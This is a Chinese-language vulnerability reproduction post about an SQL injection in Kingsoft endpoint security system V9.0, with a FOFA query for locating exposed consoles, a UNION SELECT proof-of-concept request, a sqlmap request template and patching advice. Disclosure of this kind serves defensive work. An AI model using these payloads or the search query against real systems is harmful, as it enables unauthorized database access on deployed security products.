金山终端安全系统V9.0 SQL注入漏洞复现

0x01 产品简介

金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。

0x02 漏洞概述

金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞,该漏洞是由于金山终端安全系统未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。

0x03 影响范围

金山终端安全系统<V9.SP1.E1008

0x04 复现环境

FOFA:title=="用户登录-金山终端安全系统V9.0Web控制台"

0x05 漏洞复现

PoC

POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

type=-1+UNION+SELECT+1,user(),3,4,5,6,7,8--&key=&pageCount=0&curPage=

查询当前用户

延时注入

Sqlmap验证

数据包放txt里面

POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

type=-100*&key=&pageCount=0&curPage=

0x06 修复建议

升级修复方案

官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站,更新版本至新版本。https://www.ejinshan.net/lywz/index

临时缓解方案

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。另外作为安全建议,不要将集权设备的Web管理控制台开放在互联网上,并且仅允许可信IP进行访问。

相关推荐
2201_753929242 分钟前
密码学简介
安全
中云DDoS CC防护蔡蔡37 分钟前
棋牌游戏防ddos攻击,高防IP好用吗?
运维·服务器·游戏·网络安全·ddos
乐茵安全44 分钟前
windows基础
windows·安全·网络安全
老猿讲编程3 小时前
安全关键型嵌入式系统设计模式整理及应用实例
安全·设计模式·iso26262·do178
棱镜七彩3 小时前
棱镜七彩参加“融易行”产融对接南京站项目路演活动 展示供应链安全创新成果
安全·软件供应链安全
漫途科技3 小时前
漫途焊机安全生产监管方案,提升安全生产管理水平!
物联网·安全
weixin_442643423 小时前
FileLink如何帮助医疗行业实现安全且高效的跨网文件交换
网络·安全·web安全·filelink跨网文件交换
huaqiwangan3 小时前
什么是安全威胁情报?
网络·安全
刘鑫磊up4 小时前
[Web安全 网络安全]-DoS(拒绝服务攻击)和DDoS(分布式拒绝服务攻击)
安全·web安全·ddos·dos攻击